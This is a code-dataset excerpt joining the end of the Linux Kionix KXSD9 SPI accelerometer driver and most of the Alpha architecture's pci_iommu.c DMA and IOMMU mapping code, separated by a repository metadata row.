? strlen(buf) : strlen(KXSD9_SCALE_2G)))
val = KXSD9_FS_2;
else
return -EINVAL;
mutex_lock(&st->buf_lock);
st->tx[0] = KXSD9_READ(KXSD9_REG_CTRL_C);
st->tx[1] = 0;
spi_message_init(&msg);
spi_message_add_tail(&xfers[0], &msg);
ret = spi_sync(st->us, &msg);
if (ret)
goto error_ret;
st->tx[0] = KXSD9_WRITE(KXSD9_REG_CTRL_C);
st->tx[1] = (st->rx[1] & ~KXSD9_FS_MASK) | val;
spi_message_init(&msg);
spi_message_add_tail(&xfers[1], &msg);
ret = spi_sync(st->us, &msg);
error_ret:
mutex_unlock(&st->buf_lock);
return ret ? ret : len;
}
static ssize_t kxsd9_read_accel(struct device *dev,
struct device_attribute *attr,
char *buf)
{
struct spi_message msg;
int ret;
ssize_t len = 0;
u16 val;
struct iio_dev_attr *this_attr = to_iio_dev_attr(attr);
struct iio_dev *indio_dev = dev_get_drvdata(dev);
struct kxsd9_state *st = indio_dev->dev_data;
struct spi_transfer xfers[] = {
{
.bits_per_word = 8,
.len = 1,
.cs_change = 0,
.delay_usecs = 200,
.tx_buf = st->tx,
}, {
.bits_per_word = 8,
.len = 2,
.cs_change = 1,
.rx_buf = st->rx,
},
};
mutex_lock(&st->buf_lock);
st->tx[0] = KXSD9_READ(this_attr->address);
spi_message_init(&msg);
spi_message_add_tail(&xfers[0], &msg);
spi_message_add_tail(&xfers[1], &msg);
ret = spi_sync(st->us, &msg);
if (ret)
goto error_ret;
val = (((u16)(st->rx[0])) << 8) | (st->rx[1] & 0xF0);
len = sprintf(buf, "%d\n", val);
error_ret:
mutex_unlock(&st->buf_lock);
return ret ? ret : len;
}
static IIO_DEV_ATTR_ACCEL_X(kxsd9_read_accel, KXSD9_REG_X);
static IIO_DEV_ATTR_ACCEL_Y(kxsd9_read_accel, KXSD9_REG_Y);
static IIO_DEV_ATTR_ACCEL_Z(kxsd9_read_accel, KXSD9_REG_Z);
static IIO_DEV_ATTR_IN_RAW(0, kxsd9_read_accel, KXSD9_REG_AUX);
static IIO_DEVICE_ATTR(accel_scale,
S_IRUGO | S_IWUSR,
kxsd9_read_scale,
kxsd9_write_scale,
0);
static IIO_CONST_ATTR(accel_scale_available,
KXSD9_SCALE_2G " "
KXSD9_SCALE_4G " "
KXSD9_SCALE_6G " "
KXSD9_SCALE_8G);
static struct attribute *kxsd9_attributes[] = {
&iio_dev_attr_accel_x_raw.dev_attr.attr,
&iio_dev_attr_accel_y_raw.dev_attr.attr,
&iio_dev_attr_accel_z_raw.dev_attr.attr,
&iio_dev_attr_in0_raw.dev_attr.attr,
&iio_dev_attr_accel_scale.dev_attr.attr,
&iio_const_attr_accel_scale_available.dev_attr.attr,
NULL,
};
static const struct attribute_group kxsd9_attribute_group = {
.attrs = kxsd9_attributes,
};
static int __devinit kxsd9_power_up(struct spi_device *spi)
{
int ret;
struct spi_transfer xfers[2] = {
{
.bits_per_word = 8,
.len = 2,
.cs_change = 1,
}, {
.bits_per_word = 8,
.len = 2,
.cs_change = 1,
},
};
struct spi_message msg;
u8 *tx2;
u8 *tx = kmalloc(2, GFP_KERNEL);
if (tx == NULL) {
ret = -ENOMEM;
goto error_ret;
}
tx2 = kmalloc(2, GFP_KERNEL);
if (tx2 == NULL) {
ret = -ENOMEM;
goto error_free_tx;
}
tx[0] = 0x0d;
tx[1] = 0x40;
tx2[0] = 0x0c;
tx2[1] = 0x9b;
xfers[0].tx_buf = tx;
xfers[1].tx_buf = tx2;
spi_message_init(&msg);
spi_message_add_tail(&xfers[0], &msg);
spi_message_add_tail(&xfers[1], &msg);
ret = spi_sync(spi, &msg);
kfree(tx2);
error_free_tx:
kfree(tx);
error_ret:
return ret;
};
static const struct iio_info kxsd9_info = {
.attrs = &kxsd9_attribute_group,
.driver_module = THIS_MODULE,
};
static int __devinit kxsd9_probe(struct spi_device *spi)
{
struct kxsd9_state *st;
int ret = 0;
st = kzalloc(sizeof(*st), GFP_KERNEL);
if (st == NULL) {
ret = -ENOMEM;
goto error_ret;
}
spi_set_drvdata(spi, st);
st->rx = kmalloc(sizeof(*st->rx)*KXSD9_STATE_RX_SIZE,
GFP_KERNEL);
if (st->rx == NULL) {
ret = -ENOMEM;
goto error_free_st;
}
st->tx = kmalloc(sizeof(*st->tx)*KXSD9_STATE_TX_SIZE,
GFP_KERNEL);
if (st->tx == NULL) {
ret = -ENOMEM;
goto error_free_rx;
}
st->us = spi;
mutex_init(&st->buf_lock);
st->indio_dev = iio_allocate_device(0);
if (st->indio_dev == NULL) {
ret = -ENOMEM;
goto error_free_tx;
}
st->indio_dev->dev.parent = &spi->dev;
st->indio_dev->info = &kxsd9_info;
st->indio_dev->dev_data = (void *)(st);
st->indio_dev->modes = INDIO_DIRECT_MODE;
ret = iio_device_register(st->indio_dev);
if (ret)
goto error_free_dev;
spi->mode = SPI_MODE_0;
spi_setup(spi);
kxsd9_power_up(spi);
return 0;
error_free_dev:
iio_free_device(st->indio_dev);
error_free_tx:
kfree(st->tx);
error_free_rx:
kfree(st->rx);
error_free_st:
kfree(st);
error_ret:
return ret;
}
static int __devexit kxsd9_remove(struct spi_device *spi)
{
struct kxsd9_state *st = spi_get_drvdata(spi);
iio_device_unregister(st->indio_dev);
kfree(st->tx);
kfree(st->rx);
kfree(st);
return 0;
}
static struct spi_driver kxsd9_driver = {
.driver = {
.name = "kxsd9",
.owner = THIS_MODULE,
},
.probe = kxsd9_probe,
.remove = __devexit_p(kxsd9_remove),
};
static __init int kxsd9_spi_init(void)
{
return spi_register_driver(&kxsd9_driver);
}
module_init(kxsd9_spi_init);
static __exit void kxsd9_spi_exit(void)
{
spi_unregister_driver(&kxsd9_driver);
}
module_exit(kxsd9_spi_exit);
MODULE_AUTHOR("Jonathan Cameron <jic23@cam.ac.uk>");
MODULE_DESCRIPTION("Kionix KXSD9 SPI driver");
MODULE_LICENSE("GPL v2");
| gpl-2.0 |
dineshram/linux-media-si4713USBDriver | arch/alpha/kernel/pci_iommu.c | 2306 | 25873 | /*
* linux/arch/alpha/kernel/pci_iommu.c
*/
#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/pci.h>
#include <linux/gfp.h>
#include <linux/bootmem.h>
#include <linux/export.h>
#include <linux/scatterlist.h>
#include <linux/log2.h>
#include <linux/dma-mapping.h>
#include <linux/iommu-helper.h>
#include <asm/io.h>
#include <asm/hwrpb.h>
#include "proto.h"
#include "pci_impl.h"
#define DEBUG_ALLOC 0
#if DEBUG_ALLOC > 0
# define DBGA(args...) printk(KERN_DEBUG args)
#else
# define DBGA(args...)
#endif
#if DEBUG_ALLOC > 1
# define DBGA2(args...) printk(KERN_DEBUG args)
#else
# define DBGA2(args...)
#endif
#define DEBUG_NODIRECT 0
#define ISA_DMA_MASK 0x00ffffff
static inline unsigned long
mk_iommu_pte(unsigned long paddr)
{
return (paddr >> (PAGE_SHIFT-1)) | 1;
}
/* Return the minimum of MAX or the first power of two larger
than main memory. */
unsigned long
size_for_memory(unsigned long max)
{
unsigned long mem = max_low_pfn << PAGE_SHIFT;
if (mem < max)
max = roundup_pow_of_two(mem);
return max;
}
struct pci_iommu_arena * __init
iommu_arena_new_node(int nid, struct pci_controller *hose, dma_addr_t base,
unsigned long window_size, unsigned long align)
{
unsigned long mem_size;
struct pci_iommu_arena *arena;
mem_size = window_size / (PAGE_SIZE / sizeof(unsigned long));
/* Note that the TLB lookup logic uses bitwise concatenation,
not addition, so the required arena alignment is based on
the size of the window. Retain the align parameter so that
particular systems can over-align the arena. */
if (align < mem_size)
align = mem_size;
#ifdef CONFIG_DISCONTIGMEM
arena = alloc_bootmem_node(NODE_DATA(nid), sizeof(*arena));
if (!NODE_DATA(nid) || !arena) {
printk("%s: couldn't allocate arena from node %d\n"
" falling back to system-wide allocation\n",
__func__, nid);
arena = alloc_bootmem(sizeof(*arena));
}
arena->ptes = __alloc_bootmem_node(NODE_DATA(nid), mem_size, align, 0);
if (!NODE_DATA(nid) || !arena->ptes) {
printk("%s: couldn't allocate arena ptes from node %d\n"
" falling back to system-wide allocation\n",
__func__, nid);
arena->ptes = __alloc_bootmem(mem_size, align, 0);
}
#else /* CONFIG_DISCONTIGMEM */
arena = alloc_bootmem(sizeof(*arena));
arena->ptes = __alloc_bootmem(mem_size, align, 0);
#endif /* CONFIG_DISCONTIGMEM */
spin_lock_init(&arena->lock);
arena->hose = hose;
arena->dma_base = base;
arena->size = window_size;
arena->next_entry = 0;
/* Align allocations to a multiple of a page size. Not needed
unless there are chip bugs. */
arena->align_entry = 1;
return arena;
}
struct pci_iommu_arena * __init
iommu_arena_new(struct pci_controller *hose, dma_addr_t base,
unsigned long window_size, unsigned long align)
{
return iommu_arena_new_node(0, hose, base, window_size, align);
}
/* Must be called with the arena lock held */
static long
iommu_arena_find_pages(struct device *dev, struct pci_iommu_arena *arena,
long n, long mask)
{
unsigned long *ptes;
long i, p, nent;
int pass = 0;
unsigned long base;
unsigned long boundary_size;
base = arena->dma_base >> PAGE_SHIFT;
if (dev) {
boundary_size = dma_get_seg_boundary(dev) + 1;
boundary_size >>= PAGE_SHIFT;
} else {
boundary_size = 1UL << (32 - PAGE_SHIFT);
}
/* Search forward for the first mask-aligned sequence of N free ptes */
ptes = arena->ptes;
nent = arena->size >> PAGE_SHIFT;
p = ALIGN(arena->next_entry, mask + 1);
i = 0;
again:
while (i < n && p+i < nent) {
if (!i && iommu_is_span_boundary(p, n, base, boundary_size)) {
p = ALIGN(p + 1, mask + 1);
goto again;
}
if (ptes[p+i])
p = ALIGN(p + i + 1, mask + 1), i = 0;
else
i = i + 1;
}
if (i < n) {
if (pass < 1) {
/*
* Reached the end. Flush the TLB and restart
* the search from the beginning.
*/
alpha_mv.mv_pci_tbi(arena->hose, 0, -1);
pass++;
p = 0;
i = 0;
goto again;
} else
return -1;
}
/* Success. It's the responsibility of the caller to mark them
in use before releasing the lock */
return p;
}
static long
iommu_arena_alloc(struct device *dev, struct pci_iommu_arena *arena, long n,
unsigned int align)
{
unsigned long flags;
unsigned long *ptes;
long i, p, mask;
spin_lock_irqsave(&arena->lock, flags);
/* Search for N empty ptes */
ptes = arena->ptes;
mask = max(align, arena->align_entry) - 1;
p = iommu_arena_find_pages(dev, arena, n, mask);
if (p < 0) {
spin_unlock_irqrestore(&arena->lock, flags);
return -1;
}
/* Success. Mark them all in use, ie not zero and invalid
for the iommu tlb that could load them from under us.
The chip specific bits will fill this in with something
kosher when we return. */
for (i = 0; i < n; ++i)
ptes[p+i] = IOMMU_INVALID_PTE;
arena->next_entry = p + n;
spin_unlock_irqrestore(&arena->lock, flags);
return p;
}
static void
iommu_arena_free(struct pci_iommu_arena *arena, long ofs, long n)
{
unsigned long *p;
long i;
p = arena->ptes + ofs;
for (i = 0; i < n; ++i)
p[i] = 0;
}
/*
* True if the machine supports DAC addressing, and DEV can
* make use of it given MASK.
*/
static int pci_dac_dma_supported(struct pci_dev *dev, u64 mask)
{
dma_addr_t dac_offset = alpha_mv.pci_dac_offset;
int ok = 1;
/* If this is not set, the machine doesn't support DAC at all. */
if (dac_offset == 0)
ok = 0;
/* The device has to be able to address our DAC bit. */
if ((dac_offset & dev->dma_mask) != dac_offset)
ok = 0;
/* If both conditions above are met, we are fine. */
DBGA("pci_dac_dma_supported %s from %pf\n",
ok ? "yes" : "no", __builtin_return_address(0));
return ok;
}
/* Map a single buffer of the indicated size for PCI DMA in streaming
mode. The 32-bit PCI bus mastering address to use is returned.
Once the device is given the dma address, the device owns this memory
until either pci_unmap_single or pci_dma_sync_single is performed. */
static dma_addr_t
pci_map_single_1(struct pci_dev *pdev, void *cpu_addr, size_t size,
int dac_allowed)
{
struct pci_controller *hose = pdev ? pdev->sysdata : pci_isa_hose;
dma_addr_t max_dma = pdev ? pdev->dma_mask : ISA_DMA_MASK;
struct pci_iommu_arena *arena;
long npages, dma_ofs, i;
unsigned long paddr;
dma_addr_t ret;
unsigned int align = 0;
struct device *dev = pdev ? &pdev->dev : NULL;
paddr = __pa(cpu_addr);
#if !DEBUG_NODIRECT
/* First check to see if we can use the direct map window. */
if (paddr + size + __direct_map_base - 1 <= max_dma
&& paddr + size <= __direct_map_size) {
ret = paddr + __direct_map_base;
DBGA2("pci_map_single: [%p,%zx] -> direct %llx from %pf\n",
cpu_addr, size, ret, __builtin_return_address(0));
return ret;
}
#endif
/* Next, use DAC if selected earlier. */
if (dac_allowed) {
ret = paddr + alpha_mv.pci_dac_offset;
DBGA2("pci_map_single: [%p,%zx] -> DAC %llx from %pf\n",
cpu_addr, size, ret, __builtin_return_address(0));
return ret;
}
/* If the machine doesn't define a pci_tbi routine, we have to
assume it doesn't support sg mapping, and, since we tried to
use direct_map above, it now must be considered an error. */
if (! alpha_mv.mv_pci_tbi) {
printk_once(KERN_WARNING "pci_map_single: no HW sg\n");
return 0;
}
arena = hose->sg_pci;
if (!arena || arena->dma_base + arena->size - 1 > max_dma)
arena = hose->sg_isa;
npages = iommu_num_pages(paddr, size, PAGE_SIZE);
/* Force allocation to 64KB boundary for ISA bridges. */
if (pdev && pdev == isa_bridge)
align = 8;
dma_ofs = iommu_arena_alloc(dev, arena, npages, align);
if (dma_ofs < 0) {
printk(KERN_WARNING "pci_map_single failed: "
"could not allocate dma page tables\n");
return 0;
}
paddr &= PAGE_MASK;
for (i = 0; i < npages; ++i, paddr += PAGE_SIZE)
arena->ptes[i + dma_ofs] = mk_iommu_pte(paddr);
ret = arena->dma_base + dma_ofs * PAGE_SIZE;
ret += (unsigned long)cpu_addr & ~PAGE_MASK;
DBGA2("pci_map_single: [%p,%zx] np %ld -> sg %llx from %pf\n",
cpu_addr, size, npages, ret, __builtin_return_address(0));
return ret;
}
/* Helper for generic DMA-mapping functions. */
static struct pci_dev *alpha_gendev_to_pci(struct device *dev)
{
if (dev && dev->bus == &pci_bus_type)
return to_pci_dev(dev);
/* Assume that non-PCI devices asking for DMA are either ISA or EISA,
BUG() otherwise. */
BUG_ON(!isa_bridge);
/* Assume non-busmaster ISA DMA when dma_mask is not set (the ISA
bridge is bus master then). */
if (!dev || !dev->dma_mask || !*dev->dma_mask)
return isa_bridge;
/* For EISA bus masters, return isa_bridge (it might have smaller
dma_mask due to wiring limitations). */
if (*dev->dma_mask >= isa_bridge->dma_mask)
return isa_bridge;
/* This assumes ISA bus master with dma_mask 0xffffff. */
return NULL;
}
static dma_addr_t alpha_pci_map_page(struct device *dev, struct page *page,
unsigned long offset, size_t size,
enum dma_data_direction dir,
struct dma_attrs *attrs)
{
struct pci_dev *pdev = alpha_gendev_to_pci(dev);
int dac_allowed;
BUG_ON(dir == PCI_DMA_NONE);
dac_allowed = pdev ? pci_dac_dma_supported(pdev, pdev->dma_mask) : 0;
return pci_map_single_1(pdev, (char *)page_address(page) + offset,
size, dac_allowed);
}
/* Unmap a single streaming mode DMA translation. The DMA_ADDR and
SIZE must match what was provided for in a previous pci_map_single
call. All other usages are undefined. After this call, reads by
the cpu to the buffer are guaranteed to see whatever the device
wrote there. */
static void alpha_pci_unmap_page(struct device *dev, dma_addr_t dma_addr,
size_t size, enum dma_data_direction dir,
struct dma_attrs *attrs)
{
unsigned long flags;
struct pci_dev *pdev = alpha_gendev_to_pci(dev);
struct pci_controller *hose = pdev ? pdev->sysdata : pci_isa_hose;
struct pci_iommu_arena *arena;
long dma_ofs, npages;
BUG_ON(dir == PCI_DMA_NONE);
if (dma_addr >= __direct_map_base
&& dma_addr < __direct_map_base + __direct_map_size) {
/* Nothing to do. */
DBGA2("pci_unmap_single: direct [%llx,%zx] from %pf\n",
dma_addr, size, __builtin_return_address(0));
return;
}
if (dma_addr > 0xffffffff) {
DBGA2("pci64_unmap_single: DAC [%llx,%zx] from %pf\n",
dma_addr, size, __builtin_return_address(0));
return;
}
arena = hose->sg_pci;
if (!arena || dma_addr < arena->dma_base)
arena = hose->sg_isa;
dma_ofs = (dma_addr - arena->dma_base) >> PAGE_SHIFT;
if (dma_ofs * PAGE_SIZE >= arena->size) {
printk(KERN_ERR "Bogus pci_unmap_single: dma_addr %llx "
" base %llx size %x\n",
dma_addr, arena->dma_base, arena->size);
return;
BUG();
}
npages = iommu_num_pages(dma_addr, size, PAGE_SIZE);
spin_lock_irqsave(&arena->lock, flags);
iommu_arena_free(arena, dma_ofs, npages);
/* If we're freeing ptes above the `next_entry' pointer (they
may have snuck back into the TLB since the last wrap flush),
we need to flush the TLB before reallocating the latter. */
if (dma_ofs >= arena->next_entry)
alpha_mv.mv_pci_tbi(hose, dma_addr, dma_addr + size - 1);
spin_unlock_irqrestore(&arena->lock, flags);
DBGA2("pci_unmap_single: sg [%llx,%zx] np %ld from %pf\n",
dma_addr, size, npages, __builtin_return_address(0));
}
/* Allocate and map kernel buffer using consistent mode DMA for PCI
device. Returns non-NULL cpu-view pointer to the buffer if
successful and sets *DMA_ADDRP to the pci side dma address as well,
else DMA_ADDRP is undefined. */
static void *alpha_pci_alloc_coherent(struct device *dev, size_t size,
dma_addr_t *dma_addrp, gfp_t gfp,
struct dma_attrs *attrs)
{
struct pci_dev *pdev = alpha_gendev_to_pci(dev);
void *cpu_addr;
long order = get_order(size);
gfp &= ~GFP_DMA;
try_again:
cpu_addr = (void *)__get_free_pages(gfp, order);
if (! cpu_addr) {
printk(KERN_INFO "pci_alloc_consistent: "
"get_free_pages failed from %pf\n",
__builtin_return_address(0));
/* ??? Really atomic allocation? Otherwise we could play
with vmalloc and sg if we can't find contiguous memory. */
return NULL;
}
memset(cpu_addr, 0, size);
*dma_addrp = pci_map_single_1(pdev, cpu_addr, size, 0);
if (*dma_addrp == 0) {
free_pages((unsigned long)cpu_addr, order);
if (alpha_mv.mv_pci_tbi || (gfp & GFP_DMA))
return NULL;
/* The address doesn't fit required mask and we
do not have iommu. Try again with GFP_DMA. */
gfp |= GFP_DMA;
goto try_again;
}
DBGA2("pci_alloc_consistent: %zx -> [%p,%llx] from %pf\n",
size, cpu_addr, *dma_addrp, __builtin_return_address(0));
return cpu_addr;
}
/* Free and unmap a consistent DMA buffer. CPU_ADDR and DMA_ADDR must
be values that were returned from pci_alloc_consistent. SIZE must
be the same as what as passed into pci_alloc_consistent.
References to the memory and mappings associated with CPU_ADDR or
DMA_ADDR past this call are illegal. */
static void alpha_pci_free_coherent(struct device *dev, size_t size,
void *cpu_addr, dma_addr_t dma_addr,
struct dma_attrs *attrs)
{
struct pci_dev *pdev = alpha_gendev_to_pci(dev);
pci_unmap_single(pdev, dma_addr, size, PCI_DMA_BIDIRECTIONAL);
free_pages((unsigned long)cpu_addr, get_order(size));
DBGA2("pci_free_consistent: [%llx,%zx] from %pf\n",
dma_addr, size, __builtin_return_address(0));
}
/* Classify the elements of the scatterlist. Write dma_address
of each element with:
0 : Followers all physically adjacent.
1 : Followers all virtually adjacent.
-1 : Not leader, physically adjacent to previous.
-2 : Not leader, virtually adjacent to previous.
Write dma_length of each leader with the combined lengths of
the mergable followers. */
#define SG_ENT_VIRT_ADDRESS(SG) (sg_virt((SG)))
#define SG_ENT_PHYS_ADDRESS(SG) __pa(SG_ENT_VIRT_ADDRESS(SG))
static void
sg_classify(struct device *dev, struct scatterlist *sg, struct scatterlist *end,
int virt_ok)
{
unsigned long next_paddr;
struct scatterlist *leader;
long leader_flag, leader_length;
unsigned int max_seg_size;
leader = sg;
leader_flag = 0;
leader_length = leader->length;
next_paddr = SG_ENT_PHYS_ADDRESS(leader) + leader_length;
/* we will not marge sg without device. */
max_seg_size = dev ? dma_get_max_seg_size(dev) : 0;
for (++sg; sg < end; ++sg) {
unsigned long addr, len;
addr = SG_ENT_PHYS_ADDRESS(sg);
len = sg->length;
if (leader_length + len > max_seg_size)
goto new_segment;
if (next_paddr == addr) {
sg->dma_address = -1;
leader_length += len;
} else if (((next_paddr | addr) & ~PAGE_MASK) == 0 && virt_ok) {
sg->dma_address = -2;
leader_flag = 1;
leader_length += len;
} else {
new_segment:
leader->dma_address = leader_flag;
leader->dma_length = leader_length;
leader = sg;
leader_flag = 0;
leader_length = len;
}
next_paddr = addr + len;
}
leader->dma_address = leader_flag;
leader->dma_length = leader_length;
}
/* Given a scatterlist leader, choose an allocation method and fill
in the blanks. */
static int
sg_fill(struct device *dev, struct scatterlist *leader, struct scatterlist *end,
struct scatterlist *out, struct pci_iommu_arena *arena,
dma_addr_t max_dma, int dac_allowed)
{
unsigned long paddr = SG_ENT_PHYS_ADDRESS(leader);
long size = leader->dma_length;
struct scatterlist *sg;
unsigned long *ptes;
long npages, dma_ofs, i;
#if !DEBUG_NODIRECT
/* If everything is physically contiguous, and the addresses
fall into the direct-map window, use it. */
if (leader->dma_address == 0
&& paddr + size + __direct_map_base - 1 <= max_dma
&& paddr + size <= __direct_map_size) {
out->dma_address = paddr + __direct_map_base;
out->dma_length = size;
DBGA(" sg_fill: [%p,%lx] -> direct %llx\n",
__va(paddr), size, out->dma_address);
return 0;
}
#endif
/* If physically contiguous and DAC is available, use it. */
if (leader->dma_address == 0 && dac_allowed) {
out->dma_address = paddr + alpha_mv.pci_dac_offset;
out->dma_length = size;
DBGA(" sg_fill: [%p,%lx] -> DAC %llx\n",
__va(paddr), size, out->dma_address);
return 0;
}
/* Otherwise, we'll use the iommu to make the pages virtually
contiguous. */
paddr &= ~PAGE_MASK;
npages = iommu_num_pages(paddr, size, PAGE_SIZE);
dma_ofs = iommu_arena_alloc(dev, arena, npages, 0);
if (dma_ofs < 0) {
/* If we attempted a direct map above but failed, die. */
if (leader->dma_address == 0)
return -1;
/* Otherwise, break up the remaining virtually contiguous
hunks into individual direct maps and retry. */
sg_classify(dev, leader, end, 0);
return sg_fill(dev, leader, end, out, arena, max_dma, dac_allowed);
}
out->dma_address = arena->dma_base + dma_ofs*PAGE_SIZE + paddr;
out->dma_length = size;
DBGA(" sg_fill: [%p,%lx] -> sg %llx np %ld\n",
__va(paddr), size, out->dma_address, npages);
/* All virtually contiguous. We need to find the length of each
physically contiguous subsegment to fill in the ptes. */
ptes = &arena->ptes[dma_ofs];
sg = leader;
do {
#if DEBUG_ALLOC > 0
struct scatterlist *last_sg = sg;
#endif
size = sg->length;
paddr = SG_ENT_PHYS_ADDRESS(sg);
while (sg+1 < end && (int) sg[1].dma_address == -1) {
size += sg[1].length;
sg++;
}
npages = iommu_num_pages(paddr, size, PAGE_SIZE);
paddr &= PAGE_MASK;
for (i = 0; i < npages; ++i, paddr += PAGE_SIZE)
*ptes++ = mk_iommu_pte(paddr);
#if DEBUG_ALLOC > 0
DBGA(" (%ld) [%p,%x] np %ld\n",
last_sg - leader, SG_ENT_VIRT_ADDRESS(last_sg),
last_sg->length, npages);
while (++last_sg <= sg) {
DBGA(" (%ld) [%p,%x] cont\n",
last_sg - leader, SG_ENT_VIRT_ADDRESS(last_sg),
last_sg->length);
}
#endif
} while (++sg < end && (int) sg->dma_address < 0);
return 1;
}
static int alpha_pci_map_sg(struct device *dev, struct scatterlist *sg,
int nents, enum dma_data_direction dir,
struct dma_attrs *attrs)
{
struct pci_dev *pdev = alpha_gendev_to_pci(dev);
struct scatterlist *start, *end, *out;
struct pci_controller *hose;
struct pci_iommu_arena *arena;
dma_addr_t max_dma;
int dac_allowed;
BUG_ON(dir == PCI_DMA_NONE);
dac_allowed = dev ? pci_dac_dma_supported(pdev, pdev->dma_mask) : 0;
/* Fast path single entry scatterlists. */
if (nents == 1) {
sg->dma_length = sg->length;
sg->dma_address
= pci_map_single_1(pdev, SG_ENT_VIRT_ADDRESS(sg),
sg->length, dac_allowed);
return sg->dma_address != 0;
}
start = sg;
end = sg + nents;
/* First, prepare information about the entries. */
sg_classify(dev, sg, end, alpha_mv.mv_pci_tbi != 0);
/* Second, figure out where we're going to map things. */
if (alpha_mv.mv_pci_tbi) {
hose = pdev ? pdev->sysdata : pci_isa_hose;
max_dma = pdev ? pdev->dma_mask : ISA_DMA_MASK;
arena = hose->sg_pci;
if (!arena || arena->dma_base + arena->size - 1 > max_dma)
arena = hose->sg_isa;
} else {
max_dma = -1;
arena = NULL;
hose = NULL;
}
/* Third, iterate over the scatterlist leaders and allocate
dma space as needed. */
for (out = sg; sg < end; ++sg) {
if ((int) sg->dma_address < 0)
continue;
if (sg_fill(dev, sg, end, out, arena, max_dma, dac_allowed) < 0)
goto error;
out++;
}
/* Mark the end of the list for pci_unmap_sg. */
if (out < end)
out->dma_length = 0;
if (out - start == 0)
printk(KERN_WARNING "pci_map_sg failed: no entries?\n");
DBGA("pci_map_sg: %ld entries\n", out - start);
return out - start;
error:
printk(KERN_WARNING "pci_map_sg failed: "
"could not allocate dma page tables\n");
/* Some allocation failed while mapping the scatterlist
entries. Unmap them now. */
if (out > start)
pci_unmap_sg(pdev, start, out - start, dir);
return 0;
}
/* Unmap a set of streaming mode DMA translations. Again, cpu read
rules concerning calls here are the same as for pci_unmap_single()
above. */
static void alpha_pci_unmap_sg(struct device *dev, struct scatterlist *sg,
int nents, enum dma_data_direction dir,
struct dma_attrs *attrs)
{
struct pci_dev *pdev = alpha_gendev_to_pci(dev);
unsigned long flags;
struct pci_controller *hose;
struct pci_iommu_arena *arena;
struct scatterlist *end;
dma_addr_t max_dma;
dma_addr_t fbeg, fend;
BUG_ON(dir == PCI_DMA_NONE);
if (! alpha_mv.mv_pci_tbi)
return;
hose = pdev ? pdev->sysdata : pci_isa_hose;
max_dma = pdev ? pdev->dma_mask : ISA_DMA_MASK;
arena = hose->sg_pci;
if (!arena || arena->dma_base + arena->size - 1 > max_dma)
arena = hose->sg_isa;
fbeg = -1, fend = 0;
spin_lock_irqsave(&arena->lock, flags);
for (end = sg + nents; sg < end; ++sg) {
dma_addr_t addr;
size_t size;
long npages, ofs;
dma_addr_t tend;
addr = sg->dma_address;
size = sg->dma_length;
if (!size)
break;
if (addr > 0xffffffff) {
/* It's a DAC address -- nothing to do. */
DBGA(" (%ld) DAC [%llx,%zx]\n",
sg - end + nents, addr, size);
continue;
}
if (addr >= __direct_map_base
&& addr < __direct_map_base + __direct_map_size) {
/* Nothing to do. */
DBGA(" (%ld) direct [%llx,%zx]\n",
sg - end + nents, addr, size);
continue;
}
DBGA(" (%ld) sg [%llx,%zx]\n",
sg - end + nents, addr, size);
npages = iommu_num_pages(addr, size, PAGE_SIZE);
ofs = (addr - arena->dma_base) >> PAGE_SHIFT;
iommu_arena_free(arena, ofs, npages);
tend = addr + size - 1;
if (fbeg > addr) fbeg = addr;
if (fend < tend) fend = tend;
}
/* If we're freeing ptes above the `next_entry' pointer (they
may have snuck back into the TLB since the last wrap flush),
we need to flush the TLB before reallocating the latter. */
if ((fend - arena->dma_base) >> PAGE_SHIFT >= arena->next_entry)
alpha_mv.mv_pci_tbi(hose, fbeg, fend);
spin_unlock_irqrestore(&arena->lock, flags);
DBGA("pci_unmap_sg: %ld entries\n", nents - (end - sg));
}
/* Return whether the given PCI device DMA address mask can be
supported properly. */
static int alpha_pci_supported(struct device *dev, u64 mask)
{
struct pci_dev *pdev = alpha_gendev_to_pci(dev);
struct pci_controller *hose;
struct pci_iommu_arena *arena;
/* If there exists a direct map, and the mask fits either
the entire direct mapped space or the total system memory as
shifted by the map base */
if (__direct_map_size != 0
&& (__direct_map_base + __direct_map_size - 1 <= mask ||
__direct_map_base + (max_low_pfn << PAGE_SHIFT) - 1 <= mask))
return 1;
/* Check that we have a scatter-gather arena that fits. */
hose = pdev ? pdev->sysdata : pci_isa_hose;
arena = hose->sg_isa;
if (arena && arena->dma_base + arena->size - 1 <= mask)
return 1;
arena = hose->sg_pci;
if (arena && arena->dma_base + arena->size - 1 <= mask)
return 1;
/* As last resort try ZONE_DMA. */
if (!__direct_map_base && MAX_DMA_ADDRESS - IDENT_ADDR - 1 <= mask)
return 1;
return 0;
}
/*
* AGP GART extensions to the IOMMU
*/
int
iommu_reserve(struct pci_iommu_arena *arena, long pg_count, long align_mask)
{
unsigned long flags;
unsigned long *ptes;
long i, p;
if (!arena) return -EINVAL;
spin_lock_irqsave(&arena->lock, flags);
/* Search for N empty ptes. */
ptes = arena->ptes;
p = iommu_arena_find_pages(NULL, arena, pg_count, align_mask);
if (p < 0) {
spin_unlock_irqrestore(&arena->lock, flags);
return -1;
}
/* Success. Mark them all reserved (ie not zero and invalid)
for the iommu tlb that could load them from under us.
They will be filled in with valid bits by _bind() */
for (i = 0; i < pg_count; ++i)
ptes[p+i] = IOMMU_RESERVED_PTE;
arena->next_entry = p + pg_count;
spin_unlock_irqrestore(&arena->lock, flags);
return p;
}
int
iommu_release(struct pci_iommu_arena *arena, long pg_start, long pg_count)
{
unsigned long *ptes;
long i;
if (!arena) return -EINVAL;
ptes = arena->ptes;
/* Make sure they're all reserved first... */
for(i = pg_start; i < pg_start + pg_count; i++)
if (ptes[i] != IOMMU_RESERVED_PTE)
return -EBUSY;
iommu_arena_free(arena, pg_start, pg_count);
return 0;
}
int
iommu_bind(struct pci_iommu_arena *arena, long pg_start, long pg_count,
struct page **pages)
{
unsigned long flags;
unsigned long *ptes;
long i, j;
if (!arena) return -EINVAL;
spin_lock_irqsave(&arena->lock, flags);
ptes = arena->ptes;
for(j = pg_start; j < pg_start + pg_count; j++) {
if (ptes[j] != IOMMU_RESERVED_PTE) {
spin_unlock_irqrestore(&arena->lock, flags);
return -EBUSY;
}
}
for(i = 0, j = pg_start; i < pg_count; i++, j++)
ptes[j] = mk_iommu_pte(page_to_phys(pages[i]));
spin_unlock_irqrestore(&arena->lock, flags);
return 0;
}
int
iommu_unbind(struct pci_iommu_arena *arena, long pg_start, long pg_count)
{
unsigned long *p;
long i;
if (!arena) return -EINVAL;
p = arena->ptes + pg_start;
for(i = 0; i < pg_count; i++)
p[i] = IOMMU_RESERVED_PTE;
return 0;
}
static int alpha_pci_mapping_error(struct device *dev, dma_addr_t dma_addr)
{
return dma_addr == 0;
}
